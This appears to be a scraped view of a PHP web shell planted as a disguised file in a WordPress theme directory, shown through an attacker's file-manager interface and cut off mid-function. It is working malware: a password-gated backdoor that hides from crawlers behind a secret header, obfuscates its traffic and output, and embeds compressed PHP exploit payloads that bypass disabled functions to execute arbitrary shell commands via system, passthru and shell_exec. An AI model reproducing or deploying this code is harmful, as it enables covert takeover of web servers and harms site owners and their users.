D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
mybf1
/
public_html
/
rambut.bf1.my
/
wp-content
/
themes
/
AM13S4N8
/
Filename :
VNY1ZGUI.php
back
Copy
<?php $GLOBALS['HASHTYPE'] = 'sha512'; $GLOBALS['PASSHASH'] = '7590df7a754cd0f1a21807f3c24cb00d908fd09ea7856a01f45050be5a4c6259d6a9f542303c148ffc9163a13838d4e245cfbaa769bf44c0ac4c2a0a91398400';//P@55w()rD $GLOBALS['SECHEAD'] = 'USER_AGENT'; $GLOBALS['DEFAULT_TAB'] = 'tabFM'; $GLOBALS['COOKIE'] = true; $GLOBALS['DARK'] = false; $GLOBALS['REMOTE_ADDR'] = true; $GLOBALS['ACECONF'] = array('DEFAULT' => true, 'THEME' => 'crimson_editor', 'MODE' => 'php', 'URL' => 'https://cdnjs.cloudflare.com/ajax/libs/ace/1.14.0/ace.js'); $GLOBALS['DEBUG'] = (isset($GLOBALS['DEBUG']) ? $GLOBALS['DEBUG'] : false); filterClient(); decodeRequest(); checkAuth(); function checkAuth(){ if(!$GLOBALS['PASSHASH']) return setEncKey(); $loginWithPass = (isset($_REQUEST['pass']) && hash($GLOBALS['HASHTYPE'], $_REQUEST['pass']) === $GLOBALS['PASSHASH']); $encKeyWithPass = ($GLOBALS['ENCKEY'] === genEncKey($GLOBALS['PASSHASH'])); if($loginWithPass) setEncKey($GLOBALS['PASSHASH']); elseif($encKeyWithPass) setEncKey(); else loginFormOut(); } function getEncKey(){ $len = $GLOBALS['PRELEN']; foreach($_REQUEST as $k => &$v){ $pref = strrev(substr($k, 0, $len));#tabFM $post = substr($k, $len, $len); if($pref === $post){ $eKey = $v; unset($_REQUEST[$k]); $GLOBALS['ENCKEY'] = base64_decode($eKey); return $GLOBALS['ENCKEY']; } } return false; } function genEncKey($str){ return base64_encode(hash($GLOBALS['HASHTYPE'], ($GLOBALS['REMOTE_ADDR'] ? $_SERVER['REMOTE_ADDR'] : '').$str.__FILE__)); } function setEncKey($pass = ''){ if(!$pass && $GLOBALS['ENCKEY']) return $GLOBALS['ENCKEY']; $eKey = genEncKey($pass); $GLOBALS['ENCKEY'] = $eKey; return $eKey; } function mergeRequestVars(){ $vars = array('_FILES','_COOKIE','_REQUEST'); foreach($vars as $var) if(isset($GLOBALS[$var])) foreach($GLOBALS[$var] as $k => &$v) $_REQUEST[$k] = &$GLOBALS[$var][$k]; } function decodeRequest(){ mergeRequestVars(); $GLOBALS['PRELEN'] = getPreLen(); if(!$GLOBALS['ENCKEY'] = getEncKey()) $GLOBALS['ENCKEY'] = setEncKey(); $_REQUEST = decodeInput($_REQUEST); } function getPreLen(){ return (substr(array_sum(str_split(hash($GLOBALS['HASHTYPE'], __FILE__))), -1) + 5); } function filterClient(){ $secretHeader = isset($_SERVER['HTTP_'.$GLOBALS['SECHEAD']]); $crawlerBot = preg_match('/bot|crawl|spider/i', $_SERVER['HTTP_USER_AGENT']); if($crawlerBot || !$secretHeader) exit(header('HTTP/1.1 404 Not Found')); } function loginFormOut(){ $html = '<html><head><meta name="robots" content="noindex"></head><body style="background:#f0f0f0;display:grid;height:100vh;margin:0;place-items:center center;"><form action="" method="POST" onsubmit="return login(this)"><input style="text-align: center" name="pass" type="password" value=""></form></body>'.paramsHandlerJS().'</html>'; exit(makeOut($html)); } function scriptInit(){ if(!isset($GLOBALS['DEBUG'])) return; define('D', $GLOBALS['DEBUG']); set_time_limit(D ? 15 : 0); error_reporting(D ? E_ALL : 0); ini_set('display_errors', D ? 'On' : 'Off'); ini_set('max_execution_time', D ? 15 : 0); ini_set('error_log', NULL); ini_set('log_errors', 0); } function decodeInput(&$arr){ $str = ''; foreach($arr as $k => $v){ $key = getName($k); if(!strlen($key)) continue; $str .= $key.'='.urlencode(getValue($v)).'&'; unset($arr[$k]); } parse_str($str, $dec); return array_merge($arr, $dec); } function xorStr($str, $decode = false) { $key = $GLOBALS['ENCKEY']; $key_len = strlen($key); $str = (!$decode ? rawurlencode($str) : $str); for($i = 0; $i < strlen($str); $i++) $str[$i] = $str[$i] ^ $key[$i % $key_len]; $str = ($decode ? rawurldecode($str) : $str); return $str; } function ascii2hex($ascii) { $hex = ''; for ($i = 0; $i < strlen($ascii); $i++) { $byte = strtoupper(dechex(ord($ascii[$i]))); $byte = str_repeat('0', 2 - strlen($byte)).$byte; $hex.=$byte; } return $hex; } function hex2ascii($hex){ $ascii=''; $hex=str_replace(" ", "", $hex); for($i=0; $i<strlen($hex); $i=$i+2) $ascii.=chr(hexdec(substr($hex, $i, 2))); return($ascii); } function setName($str){ $str = ascii2hex(xorStr($str)); $pref = substr($GLOBALS['ENCKEY'], 0, $GLOBALS['PRELEN']); return $pref.$str; } function getName($str){ $data = getData($str); if($data === false) return false; return xorStr(hex2ascii($data), true); } function setValue($str){ return base64_encode(xorStr($str)); } function getValue($str){ return xorStr(base64_decode($str), true); } function getData($str){ $ln = $GLOBALS['PRELEN']; $pref = substr($str, 0, $ln); $data = substr($str, $ln); return ($pref === substr($GLOBALS['ENCKEY'], 0, $ln) ? $data : false); } function paramsHandlerJS(){ return '<script> var ENCKEY = atob("'.base64_encode($GLOBALS['ENCKEY']).'"); var PRELEN = '.$GLOBALS['PRELEN'].'; var COOKIE = '.(int)$GLOBALS['COOKIE'].'; '.($GLOBALS['DARK'] ? 'invertColors();' : '').' startEventsListners(); if(COOKIE){ if(ci = document.getElementById("cbCO")) ci.checked = "on"; deleteAllCookies(); } function startEventsListners(){ var elements = document.getElementsByTagName("*"); for(var i=0;i<elements.length;i++){ if(elements[i].type && elements[i].type == "file") elements[i].onchange = function(e){ if(!elmById("cbRR").checked) prepareFile(this) else uplFiles(); } } } function bin2hex(bin){ var hex = ""; for(var i = 0; i<bin.length; i++){ var c = bin.charCodeAt(i); if (c>0xFF) c -= 0x350; hex += (c.toString(16).length === 1 ? "0" : "") + c.toString(16); } return hex; } function login(form){ addEncKey(form); form.pass.value = setValue(form.pass.value); form.pass.name = setName(form.pass.name); if(COOKIE) submitViaCookie(form); else return true; return false; } function hex2bin(hex) { var bin = ""; for (var i=0; i<hex.length; i=i+2) { var c = parseInt(""+hex[i]+hex[i+1], 16); if (c>0x7F) c += 0x350; bin += String.fromCharCode(c); } return bin; } function xorStr(str, decode = false) { str = (!decode ? encodeURIComponent(str) : str); str = str.split(""); key = ENCKEY.split(""); var str_len = str.length; var key_len = key.length; var String_fromCharCode = String.fromCharCode; for(var i = 0; i < str_len; i++) { str[i] = String_fromCharCode(str[i].charCodeAt(0) ^ key[i % key_len].charCodeAt(0)); } str = str.join(""); if(decode){ try{ str = decodeURIComponent(str); } catch(e){ str = unescape(str); } } return str; } function setName(str){ str = bin2hex(xorStr(str)); pref = ENCKEY.substr(0, PRELEN); return pref + str; } function setValue(str){ return btoa(xorStr(str)); } function getValue(str){ return xorStr(atob(str), true); } function addEncKey(form){ var encKey = document.createElement("input"); encKey.type = "hidden"; pref = ENCKEY.substr(0, PRELEN); encKey.name = pref.split("").reverse().join("") + pref; encKey.value = btoa(ENCKEY); form.appendChild(encKey); return form; } function fixFileName(str, len = false){ str = str.split(/(\\\\|\\/)/g).pop(); if(len) str = str.substring(0, len); return str; } function getParentFormOf(element){ while(element.tagName != "FORM") element = element.parentElement; return element; } function prepareFile(input){ var file = input; form = getParentFormOf(input); form.enctype = "application/x-www-form-urlencoded"; if(file.files.length){ var reader = new FileReader(); reader.onload = function(e){ filename = fixFileName(input.value); wwwFile = document.createElement("input"); wwwFile.type = "hidden"; wwwFile.id = input.name; wwwFile.name = input.name + "["+filename+"]"; wwwFile.value = e.target.result; if(e.target.result.length <= 2097152) form.appendChild(wwwFile); else if(confirm("Request size is ~" + Math.round(((e.target.result.length * 2) / 1024) / 1024) + "M, but limits is often around <= 8M. There is no guarantee that the file will be uploaded.\nYou can disable request encoding, use other upload methods or select a smaller file. Continue?")) form.appendChild(wwwFile); else return false; uplFiles(); elements = form.getElementsByTagName("*"); for(var i = 0; i < elements.length; i++) if(elements[i].type === "hidden") form.removeChild(elements[i]); }; reader.readAsDataURL(file.files[0]); return reader; } } function deleteAllCookies() { var cookies = document.cookie.split(";"); for (var i = 0; i < cookies.length; i++) { var cookie = cookies[i]; var eqPos = cookie.indexOf("="); var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie; document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT"; } return false; } function submitViaCookie(encodedForm, refresh = true){ var reqlen = 0; var elements = encodedForm.getElementsByTagName("*"); for(i = 0; i < elements.length; i++) { if(!elements[i].name) continue; name = elements[i].name; value = encodeURIComponent(elements[i].value); if(value.length > 4095 || reqlen > 7696){ if(confirm("The request header is too big, send it via POST?")){ deleteAllCookies(); return false; } else{ deleteAllCookies(); return "CANCEL"; } } document.cookie = name + "=" + value; reqlen = reqlen + name.length + value.length; } if(refresh) window.location = window.location.pathname; else return "SEND"; } function invertColors() { var css = "html{-webkit-filter: invert(90%); -moz-filter: invert(90%); -o-filter: invert(90%); -ms-filter: invert(90%);}"; var head = document.getElementsByTagName("head")[0]; var style = document.createElement("style"); if(!window.counter) window.counter = 1; else{ window.counter++; if (window.counter % 2 == 0) var css = "html{-webkit-filter: invert(0%); -moz-filter: invert(0%); -o-filter: invert(0%); -ms-filter: invert(0%);}" } style.type = "text/css"; if(style.styleSheet) style.styleSheet.cssText = css; else style.appendChild(document.createTextNode(css)); head.appendChild(style); return false; } </script>'; } function makeOut($str){ return (c('<script>').t(f('write', 1).'('.f('decodeURIComponent').'('.f('atob').'(('.i(base64_encode(rawurlencode(c($str, 1))), 100, 400).'))));', true).c('</script>')); } function f($f, $d = false){ $r = rand(0,1); return ($r ? (rand(0,1) && !$d ? f('self') : ($r && !$d ? f('top') : f('document'))).'['.i($f, 1, 3).']' : ($d ? f('document').'.'.$f : $f)); } function i($s, $m, $x){ $s = str_split($s, rand($m, $x)); if($m > 50) $s[0] = trim(i($s[0], 1, 5, true), '"\''); return implode('+', array_map(function($k){$r = date('H') > 12; return ($r ? '"' : '\'').$k.($r ? '"' : '\'');}, $s)); } function c($s = '', $n = 0){ $r = array('/', '>', '*'); return (rand($n, 1) ? '<!--'.str_replace($r, '', j(1)).'-->'.(strlen($s) ? $s.(rand(0, 1) ? '<!--'.str_replace($r, '', j(1)).'-->'."\n" : '') : '') : $s); } function j($a = 0){ $l = rand(10, 100); while(!isset($c[$l])) @$c .= chr($a ? rand(32, 126) : rand(1, 127)); if(rand(0, 1)) return "//".str_replace(array("\r","\n"), "", $c)."\n"; else return "/*".preg_replace("|\*/|","", $c)."*/"; } function t($s, $n = false){ if(!function_exists('token_get_all')) return $s; $s = ($n ? '<?php ' : '').$s; foreach(token_get_all($s) as $t) @$r .= (is_array($t) ? $t[1] : $t).j(); return ($n ? substr($r, 6) : $r); } function sDie($str = ''){ if(RO) die($str); else{ $out = ob_get_contents(); ob_end_clean(); } if(preg_grep('|attachment|', headers_list())) print gzencode($out.$str, 9); else print setValue($out.$str); die; } function safemode($cmd = 'check'){ if(!defined('PHP_VERSION_ID')) return false; $c = __FUNCTION__; $v = PHP_VERSION_ID; $pocs['cm_php_fpm'] = array('v' => ((strpos(php_sapi_name(), 'fpm') !== false) && is_int(array_search(true, array_map(function($f){if(function_exists($f)) return true;}, array('mail', 'error_log', 'imap_mail','mb_send_mail'))))), 'r' => 'execFPM($'.$c.')', 'c' =>'eJyNV21T20YQ/kxn+h8ORZmTMopkAyaEhFAGTPBMwK5x0ukkmRtZOmEVWdJIMoG2/Pfu7t35BZu2Mj7f7T63t7valyOZ5VGTFjmT9zI6H1w6djSN3b9+/mnLrmTNjlgSZrV8B2v4SxPHTsopUG9kg2CXkFt2PR2EzQToaZ4K4Dm8lnk8DdNMlMDgLgrYUtDJeZpJgDppLX5UaROOM+lwn7vsmAlx1hsKwQ5Z/VCjINHIaSnitIKjfB5wfxp3nCadSliTTHt6e56FNyAPOVq6T0YQP4GlKGeNiIq8kXlTG4zH+IvtYJzmQT3hvvUtt3z+gnFfC1QUlONz9gHpapuSGk2mRbyQ1HrT6SyZWE5KbaPRh/tA488ppPGg0ftjmLPjD8phJCwqYpTEcbElq6qoRCXLomrS/MZpqVO30O01uN1SgKy4sUCrp0wgCwLUhqv4iZPoKBDyPq1BJaueyCwTGBOW6xLKxMOC41hzr/jc0ocZidtpjWfiJh0kYHpRyTCaOGFVhQ+OheEBiqzobKXTsBSKY03HAsNILV0W1sxGRbU+m/RWfHMe6Ixrp+3BR+sHzxi0uDWrR/p95NoZeB5lAYS5x8azNIsHYXSrop3ehccW78vEhPuOwbO83+THmgzO4TVz3Eop4y6Fjc43jA+M/KcBa97XLM/S/NZZiUdD05oR8VFFUCWbWZUzZ7tuqrKo6Y3A8SrKMefo3EOV57jxEY8xjv3fLmDgc3SCXRIWDGmKGneg861v960WfNv6d+1L0bO83adS0qRhlv4pB2EVTrUwBcNHRdFijQ8fdn/93L0eicvu6KJ/xtkRpO7H7oh7T3DX3eGX7lAMhv1R/7T/SQEvRqNB0Pbba+iPJ6Pubye/i97VqDs8PzntKvzpx95GuBZ+dXKpgVkRhdmkqJs1KB4pLvrXo/8CDruX/VFXnJydDRW0vfPGb8Fnw/Gnw95gJM57n7pzFeYv7Al2cDEAmZe9K/Hl5NNnhf2jSHMHy5+30ce0L8yy4oeYVZlI8yibxfKI+yo4IKJ4P+cQUbyfJNz1NuyO0xqrvjBRVh8hdBOyKGUuxmEtoQU8CwpnTSFKqIpYLDB/VpSJwyY89LgPysociY4us/IuzByUvb8nYkkcqGiaoKEkxcXyBjmOdRntIqOweKx2ueVTTZsDdDCrq6CmRqPR7HXDXqfcXTXFXVrr6YasmGfV3r8xO6pYIFvnv0at5bcpVNTx7yBtMSIgeq97/SusIjZahnVJhQIP7sIqqGZ5AB4MsJaReRS36yxDeAanupx9J6vFAfbd19Z3KCv448PYpnFnEwnH3e9YToNXMHa4xzv+Lo17NCrKPoxv8Ou3aGzTuEPjLo2IPiDuAXEPiHtA3APgvgqUokXZLBRVJOhdeYGNHiZQYLFRc926TbfTHsTuhTOXzRlkONJh4jIS//U7CkOcz/HK4CPP56+hHfl1Ed3yuSKEXFSBw7etVmvtaNIYT4AJtc3FDe4XUFeGU4FSsdtkKTQbh7aAn9k2CA845k8TlYdBQAk9y9N7nLs+wjymzPeM9R5r68uCCTo4SnUtTTCXydUYXG26OlL1zXIiw1jFhz0u4oe5g6llJnCPqp9sI+aPCSSfs53IQtlrrgQ2tEm8TSUQ9mbjXuvtvrkpAVohjpj1rYIS6LKl28JcGUg1whH5UbXl9SO1xv5zxyVRVtRSgbVJJv+N/1DAmrs2NUY7jckFuF6EKJCw+pHTyANLMUlIDI1b+UAdAqrhTGqv0y5QHH3qWKdXlgevF8qng2jXc9rv3++2XfY3M2S1WV/JzW4EP6EQTt9OFmGh6xYZsaeVXr+KLKPs5qGUC/MsSxWw+eWjLqs0bxIHbx7tl9HiQ7cNKt9KBM3SmAVsp7MPAmH6kqZ0m9PWkT4Gskp8DvySHQDR1Ogl3dALCHm3SoPdeK+XYUM6g47OmkBX/1ewuaz/A3c4q58='); $pocs['mm0r1_filter'] = array('v' => ($v >= 70000 && $v <= 70234 || $v >= 70300 && $v <= 70333 || $v >= 70400 && $v <= 70425 || $v > 80000 && $v < 80013), 'r' => 'pwn($'.$c.')', 'c' => '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'); $pocs['mm0r1_concat'] = array('v' => ($v == 80013 && $v == 80014 || $v > 80100 && $v < 80120), 'r' => 'new Pwn($'.$c.')', 'c' =>'eNqtV1tvo0YUfs+vmFrIgpqswE5tJw6pvE20SS/ZNJc+rGuhMQxrEgzWABtnt/7vPTNcPAwQZ6taijwx53zn/s3BCXAco0sSrAlF39A6XQS+gxSsI2UBf84EbQ8cLnPzHKJvBwg+ThTGCfrl8uH6N/t8ej+1764+XSALGZuhMalJ5A8/XVyf2+cX7x8+2O8frn4/Rz+jmATeyYmM0wOcvoFOmh+L+Hf3t1fXHwoDzWiHgGaO4cucHAiql/c7p01zPJEeNQAXGjXAPGVeGjqJH4XItjkOTZ1EVZyVq+VZYx8voqriM6sTBN+nyOSHXk8UYh/lM42i1WxemsdBEDlqdhbc0yZvV6sGJmhuy1N5UCAGByc2xGFj16UlIPzQXycQRbL048OzJcFrOyD4SdV0ZA4FUMXzg+AN7u8UMkS8cL4jaAXECwdrPvcqPZF1j2zOo4SoJYqIXATIJ8NCIXnOx2Qn43sqGAtIqO6c16Cq0CGDwUiuKSVJSkMx7c3GAAbsdQJCks6kTWQBIkXLqcoGbG1bZR3e5h4hrocdIuYgk7CXOHQDQmOWxEyVksCmBLuqUSmRE0RxSkmZcVkYBrdR3iGiNEhWkdjIm4aQ/B3CAse+Y7NIBe8+k8QWHqiCnYr5r75nxy9xQlZV3ew3VQSv6Hn4CbByzMjzeP5GxqR9jlnFx/zcs9C4Ns27PD1TP4GGq1noga7+aooUX2uc2TeBG5vBGAZUR0dii+d1ZzIxSSCcm8sb+4/prx9v7b8ubu+uPl4jy4J4gKtZ/MDJQPHjyfeZlqzoYlnas150WDnfPdQcFyPvdodYR+oN0EIWVHmytIy23wDbgpiGEGcdNhPIp35N/S84IbtrQ2BSoXsUTFkaZrO5jmbz+c4GWLAJpVE5vGrJBhpKY4LULtPVUVdZpF6tITNYU7o9QJJxL/AnJWuCE7Xz98YwOjrad4FUGJnSmTlH7/aQONygOXd2ppTil47Y3RlVcodez1pO3yz/YtbW+CWIsAvBrLHzpHb+/BGCMDYuzNWCEI+dHeyRBV4QKKPM/IX2u2oupi2J2EVSaGqNVPb/lJJ9FWb+Y1ULfSCE/UXsbDqvl6BkfyUbcNGrvI6NqwNMNuQ+19lvIieYkkS+4CBlxQuRRLjAzahKzkrYsmSVjsxyXE6zbHtyluAnN4G67O705EUre3Z2BsZlUm6PgiWJNVuT2w0cYxp5c2ZLp3hB5vYtVN0/ygVCqywpYO0HK7NXaHYtpJro9BSxh/A10DS+0woXSzGEXOH1ArVdqhUmyxldeL5z0o3k2ng2CRP6Iu8N0qzmoiFe1TaMHEBHQ0meJaRQsfhbizv8aXQ0GoyORwO5R8REyH5At4wl7K00kFzK4m80Qpug56UfkNJFXhxD25/iys4jk16GCe8dpM4LvIf4u45Rz4UcFlsS8sxMx6jbreXDD23MKFttysgRU9drOuwz6xvm2BgNYA2B07FxbPTZqW8YxwODn0z221xrKoKyitw0ILxutf1TsJ/voK+py5oycoM6y1MFIWuco1F/aA6PhmRosgZq8ntPA4G74wZ725auqjBMnOBEfPPMblol9r+SJhKGCyBepp4HXSJfa5lOtQNl9JK+4QAaa0awjUTGIiNxzAm4ujE/ssyHGc/AP2cZRT8eHjZ2LMM4Pa0QbOXZPxaKqMv9mYE7QN2P88YNuUh/rlhEuT34F11ikeU='); foreach($pocs as $pocname => $poc) { if(!$poc['v']) continue; switch($cmd){ case 'check': return $pocname; break; default: ob_start(); eval('$'.$c.' = \'(echo "via '.$pocname.':";'.addslashes($cmd).') 2>&1\';echo '.$poc['r'].';'.gzuncompress(base64_decode($poc['c']))); $res = ob_get_contents(); ob_end_clean(); if(strpos($res, $pocname)) return $res; } } return (isset($res) ? $c.' for '.$v.' fails ;( ' : false); } # # # $ini = array( 'disable_classes' => '', 'disable_functions' => '', 'display_errors' => 0, 'enable_post_data_reading' => 1, 'error_log' => '', 'error_reporting' => 0, 'file_uploads' => 1, 'log_errors' => 0, 'log_errors_max_len' => -1, 'magic_quotes_gpc' => 0, 'magic_quotes_runtime' => 0, 'magic_quotes_sybase' => 0, 'max_execution_time' => 0, 'memory_limit' => '1024M', 'open_basedir' => '', 'safe_mode' => 0, 'safe_mode_exec_dir' => ''); $sysini = ini_get_all(); foreach($ini as $k => $v) if(isset($sysini[$k]) && $sysini[$k]['access'] == 7) ini_set($k, $v); scriptInit(); function unQuote($a){ foreach($a as $k => $v) if(is_array($v)) $a[$k] = unQuote($v); else $a[$k] = stripslashes($v); return $a; } function prepVals(&$a,$k){ foreach($a as $i => $v) if(is_array($v)) prepVals($a[$i],$k); elseif(strlen($v)>2){ $r = ''; $v = explode($k, $v); for($n = count($v)-1; $n>=0; --$n){ $c = array_pop($v); if($c === '') $c = $k; if($n%2 === 0) $r .= $c; else $r = $c.$r; } $a[$i]=$r; } } if(defined('CED')) $D = unserialize(pack('H*', CED)); else{ if(isset($_REQUEST['a'])) $D=$_REQUEST; elseif(isset($_REQUEST['a'])) $D=$_REQUEST; else $D=array(); if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) $D = unQuote($D); if(isset($D['k'])){ $k = $D['k']; unset($D['k']); prepVals($D,$k); } } $C = array(''=>'UTF-8','UTF-16','Windows-1250','Windows-1251','Windows-1252','Windows-1254','Windows-1256','Windows-1257','ISO-8859-1','ISO-8859-2','ISO-8859-7','ISO-8859-8','ISO-8859-9','ISO-8859-13','Big5','GBK','Shift_JIS','EUC-KR','EUC-JP','IBM866','KOI8-R','KOI8-U',); define('VER', '1.4'); define('DSC', DIRECTORY_SEPARATOR); define('NIX', DSC === '/'); define('RO', isset($D['ro']) ? true : false); define('TM', isset($D['tm']) ? true : false); define('CSE', isset($D['c']) ? $C[$D['c']]:'UTF-8'); ob_end_clean(); if(!RO) ob_start(); if(!defined('CED')){ if(isset($D['a'])){ $md5 = md5(rand(0, 777777)); if(isset($D['d'])){ if($D['a']==='f'){ if(is_array($D['d'])){ $D['DBP'] = samePath($D['d']); $n = $md5.'.zip'; } elseif(is_dir($D['d'])) $n = $md5.'.zip'; else $n = fileName($D['d']); $n = escFileName($n); } else $n = $md5.'.zip'; header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$n.(RO ? '' : '.gz').'"'); } else{ header('Content-Type: application/json; charset='.CSE); } } else header('Content-Type: text/html; charset='.CSE); } function escHTML($v){ return str_replace(array('&','"','<','>'), array('&','"','<','>'), $v); } function selfPath(){ if(isset($_SERVER['SCRIPT_FILENAME'])) return filePath($_SERVER['SCRIPT_FILENAME']); if(isset($_SERVER['DOCUMENT_ROOT'])) return substr($_SERVER['DOCUMENT_ROOT'],-1) === DSC ? $_SERVER['DOCUMENT_ROOT'] : $_SERVER['DOCUMENT_ROOT'].DSC; if(PHP_VERSION >= '5.3') return substr(__DIR__,-1) === DSC ? __DIR__ : __DIR__.DSC; return filePath(__FILE__); } function filePath($p){ $p = rtrim($p, DSC); return implode(DSC, array_slice(explode(DSC,$p), 0, -1)).DSC; } function fileName($p){ $p=rtrim($p, DSC); $i=strrpos($p, DSC); return $i=== FALSE ? $p : substr($p,$i+1); } function writeFile($p,$c){ if($v = fopen($p,'wb')){ flock($v,LOCK_EX); fwrite($v,$c); fflush($v); flock($v,LOCK_UN); fclose($v); return TRUE; } if(PHP_VERSION>='5'){ $v = file_put_contents($p,$c); if(is_int($v)) return TRUE; } if(PHP_VERSION>='5') : if(PHP_VERSION>='5.1'){ try{ $v = new SplFileObject($p,'wb'); } catch(Exception $e ){ $v=FALSE; } if($v){ $v->flock(LOCK_EX); $v->fwrite($c); $v->fflush(); $v->flock(LOCK_UN); unset($v); return TRUE; } } endif; return FALSE; } function tempName(){ $a = 'poiuytrewqlkjhgfdsamnbvcxzMNBVCXZLKJHGFDSAPOIUYTREWQ0987654321'; $v = '.'; for($i = 0; $i < 8; ++$i) $v .= $a[rand(0,61)]; return $v.'.tmp'; } function tempFile($v){ if(($n = tempnam(NIX ? '/tmp' : 'c:\\Temp', '')) && (writeFile($n, $v))) return $n; $a = array('upload_tmp_dir','session.save_path','user_dir','doc_root'); foreach($a as $k) if($n = ini_get($k)){ $n .= DSC.tempName(); if(writeFile($n, $v)) return $n; } $n = selfPath().tempName(); if(writeFile($n, $v)) return $n; return FALSE; } function getFile($p){ $v = NULL; if($v = fopen($p,'rb')){ $r = ''; while(!feof($v)) $r .= fread($v, 1048576); fclose($v); return $r; } if(PHP_VERSION >= '4.3'){ $v = file_get_contents($p); if(is_string($v)) return $v; } $v = file($p); if(is_array($v)) return implode('',$v); if(PHP_VERSION>='5') : if(PHP_VERSION>='5.1'){ try{ $v = new SplFileObject($p,'rb'); } catch(Exception $e){ $v = FALSE; } if($v){ $r = ''; while(!$v->eof()) $r .= $v->fgets(); unset($v); return$r; } } endif; if(RO && defined('FORCE_GZIP')){ if($v = gzopen($p)){ $r=''; while(!gzeof($v)) $r .= gzread($v, 1048576); gzclose($v); return $r; } $v = gzfile($p); if(is_array($v)) return implode('',$v); } if(RO && $v=ob_start()){ if(is_int(readfile($p)) || copy($p, 'php://output') || (defined('FORCE_GZIP') && is_int(readgzfile($p)))){ $r = ob_get_contents(); ob_end_clean(); return $r; } ob_end_clean(); } return FALSE; } function delFile($p){ return (unlink($p) || (NIX && rename($p,'/dev/null') && !is_file($p) && !file_exists($p))); } function nesc($v){ return "'".str_replace("'", '\'"\'"\'', $v)."'"; } function wesc($v){ return str_replace(array('^', '&', '\\', '<', '>', '|'), array('^^', '^&', '^\\', '^<', '^>', '^|'), $v); } function exe($cmd, $fnc, $sh = '', $se = TRUE, $or = '') { $se = '2>' . ($se ? '&1' : (NIX ? '/dev/null' : 'nul')) . $or; if (NIX) $sc = 'echo ' . nesc($cmd) . '|' . ($sh === '' ? '$0' : $sh) . ' ' . $se . ' & exit'; else $sc = ($sh === '' ? '(' . $cmd . ')' : $sh . ' /C ' . wesc($cmd) . ' ') . $se; switch ($fnc) { case 0: system($sc); break; case 1: passthru($sc); break; case 2: echo `$sc`; break; case 3: echo shell_exec($sc); break; case 4: $r = NULL; exec($sc, 